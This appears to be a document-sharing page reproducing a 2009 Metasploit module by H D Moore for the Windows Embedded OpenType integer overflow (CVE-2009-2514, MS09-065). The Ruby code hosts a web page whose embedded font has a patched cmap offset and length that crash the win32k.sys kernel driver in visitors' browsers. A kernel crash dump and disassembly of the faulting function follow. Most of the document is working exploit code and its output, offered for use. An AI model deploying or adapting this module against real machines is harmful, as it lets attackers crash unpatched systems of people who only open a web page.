Get documents about "Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution
Document Sample
Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution Page 1/4
1 ##
2 # $Id: ms09_065_eot_integer.rb 7470 2009−11−11 23:48:53Z hdm $
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12
13 require ’msf/core’
14
15
16 class Metasploit3 < Msf::Auxiliary
17
18 include Msf::Exploit::Remote::HttpServer::HTML
19
20 def initialize(info = {})
21 super(update_info(info,
22 ’Name’ => ’Microsoft Windows EOT Font Table Directory Integer Overflow’,
23 ’Description’ => %q{
24 This module exploits an integer overflow flaw in the Microsoft Windows Embedded
25 OpenType font parsing code located in win32k.sys. Since the kernel itself parses
26 embedded web fonts, it is possible to trigger a BSoD from a normal web page when
27 viewed with Internet Explorer.
28 },
29 ’License’ => MSF_LICENSE,
30 ’Author’ => ’hdm’,
31 ’Version’ => ’$Revision: 7470 $’,
32 ’References’ =>
33 [
34 [ ’CVE’, ’2009−2514’ ],
35 [ ’MSB’, ’MS09−065’ ],
36 [ ’OSVDB’, ’59869’]
37 ],
38 ’DisclosureDate’ => ’Nov 10 2009’
39 ))
40 register_options([
41 OptPath.new(’EOTFILE’, [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.inst
all_root, "data", "exploits", "pricedown.eot")]),
42 ], self.class)
43
44 end
45
46 def run
47 exploit
48 end
49
50 def on_request_uri(cli, request)
51 @tag ||= Rex::Text.rand_text_alpha(8)
H D Moore 11/12/2009
Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution Page 2/4
52 @eot ||= ::File.read(datastore[’EOTFILE’], ::File.size(datastore[’EOTFILE’]))
53
54 if(request.uri =~ /#{@tag}$/)
55 content = @eot.dup
56
57 # Only this table entry seems to trigger the bug
58 cidx = content.index(’cmap’)
59
60 # Use an offset and a length that overflow when combined
61 coff = 0xb0000000
62 clen = (0xfffffffe − coff + 0xcc)
63
64 # Patch in the modified offset and length values
65 content[cidx + 8, 8] = [ coff, clen ].pack("N*")
66
67 # Send the font on its merry way
68 print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")
69 send_response_html(cli, content, { ’Content−Type’ => ’application/octet−stream’ })
70 else
71 var_title = Rex::Text.rand_text_alpha(6 + rand(32))
72 var_body = Rex::Text.rand_text_alpha(64 + rand(32))
73 var_font = Rex::Text.rand_text_alpha(2 + rand(6))
74 var_face = Rex::Text.rand_text_alpha(2 + rand(32))
75
76 content = %Q|<html><head><title>#{var_title}</title><style type="text/css">
77 @font−face{ font−family: ’#{var_face}’; src: url(’#{get_resource}/#{var_font}#{@tag}’); }
78 body {
79 font−family: ’#{var_face}’;
80 }
81 </style></head><body> #{var_body} </body></html>|
82
83 print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")
84 send_response_html(cli, content, { ’Content−Type’ => ’text/html’ })
85 end
86 end
87 end
88
89 =begin
90
91 #
92 # Crash dump information
93 #
94
95 READ_ADDRESS: b0f70072
96
97 FAULTING_IP:
98 win32k!bComputeIDs+28
99 bf87c9df 8a6702 mov ah,byte ptr [edi+2]
100
101 MM_INTERNAL_CODE: 0
102
103 IMAGE_NAME: win32k.sys
H D Moore 11/12/2009
Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution Page 3/4
104
105 DEBUG_FLR_IMAGE_TIMESTAMP: 45f013f6
106
107 MODULE_NAME: win32k
108
109 FAULTING_MODULE: bf800000 win32k
110
111 DEFAULT_BUCKET_ID: DRIVER_FAULT
112
113 BUGCHECK_STR: 0x50
114
115 PROCESS_NAME: csrss.exe
116
117 TRAP_FRAME: b22192e8 −− (.trap 0xffffffffb22192e8)
118 ErrCode = 00000000
119 eax=00000000 ebx=00000000 ecx=500000ca edx=00f70010 esi=b22198d8 edi=b0f70070
120 eip=bf87c9df esp=b221935c ebp=b2219374 iopl=0 nv up ei pl nz na pe nc
121 cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
122 win32k!bComputeIDs+0x28:
123 bf87c9df 8a6702 mov ah,byte ptr [edi+2] ds:0023:b0f70072=??
124 Resetting default scope
125
126 LAST_CONTROL_TRANSFER: from 804f79d7 to 80526fc8
127
128 STACK_TEXT:
129 b2218e24 804f79d7 00000003 b0f70072 00000000 nt!RtlpBreakWithStatusInstruction
130 b2218e70 804f85c4 00000003 00000000 c0587b80 nt!KiBugCheckDebugBreak+0x19
131 b2219250 804f8aef 00000050 b0f70072 00000000 nt!KeBugCheck2+0x574
132 b2219270 8051c0d3 00000050 b0f70072 00000000 nt!KeBugCheckEx+0x1b
133 b22192d0 8053f90c 00000000 b0f70072 00000000 nt!MmAccessFault+0x8e7
134 b22192d0 bf87c9df 00000000 b0f70072 00000000 nt!KiTrap0E+0xcc
135 b2219374 bf87a391 00f70010 b22198d8 b2219a76 win32k!bComputeIDs+0x28
136 b22193a8 bf87a02b 00f70010 00004d18 00000000 win32k!bVerifyTTF+0xe1
137 b2219a68 bf879f0e e234b668 00f70010 00004d18 win32k!bLoadTTF+0x7c
138 b2219af0 bf879e48 e234b668 00f70010 00004d18 win32k!bLoadFontFile+0x228
139 b2219b40 bf879911 00000001 e234b660 b2219bf0 win32k!ttfdSemLoadFontFile+0x4c
140 b2219b70 bf87989f 00000001 e234b660 b2219bf0 win32k!PDEVOBJ::LoadFontFile+0x3a
141 b2219ba8 bf96370c 00000000 00000000 e234b660 win32k!vLoadFontFileView+0x12b
142 b2219c5c bf93eda9 e234b660 00000000 00000000 win32k!PUBLIC_PFTOBJ::hLoadMemFonts+0x6a
143 b2219cb4 bf9488e4 00f70000 e10ff0b0 00000000 win32k!GreAddFontMemResourceEx+0x76
144 b2219d48 8053ca28 0297cc48 00004d18 00000000 win32k!NtGdiAddFontMemResourceEx+0xb0
145 b2219d48 7c90eb94 0297cc48 00004d18 00000000 nt!KiFastCallEntry+0xf8
146 0172f6dc 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
147
148 win32k!bComputeIDs:
149 bf87c9b7 8bff mov edi,edi
150 bf87c9b9 55 push ebp
151 bf87c9ba 8bec mov ebp,esp
152 bf87c9bc 83ec10 sub esp,10h
153 bf87c9bf 8b450c mov eax,dword ptr [ebp+0Ch]
154 bf87c9c2 8b4804 mov ecx,dword ptr [eax+4]
155 bf87c9c5 53 push ebx
H D Moore 11/12/2009
Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution Page 4/4
156 bf87c9c6 57 push edi
157 bf87c9c7 8b38 mov edi,dword ptr [eax]
158 bf87c9c9 037d08 add edi,dword ptr [ebp+8]
159 bf87c9cc 33db xor ebx,ebx
160 bf87c9ce 33c0 xor eax,eax
161 bf87c9d0 83f904 cmp ecx,4
162 bf87c9d3 895df8 mov dword ptr [ebp−8],ebx
163 bf87c9d6 894dfc mov dword ptr [ebp−4],ecx
164 bf87c9d9 0f82cf000000 jb win32k!bComputeIDs+0x1be (bf87caae)
165 bf87c9df 8a6702 mov ah,byte ptr [edi+2] <−−− the crash above
166
167 =end
H D Moore 11/12/2009
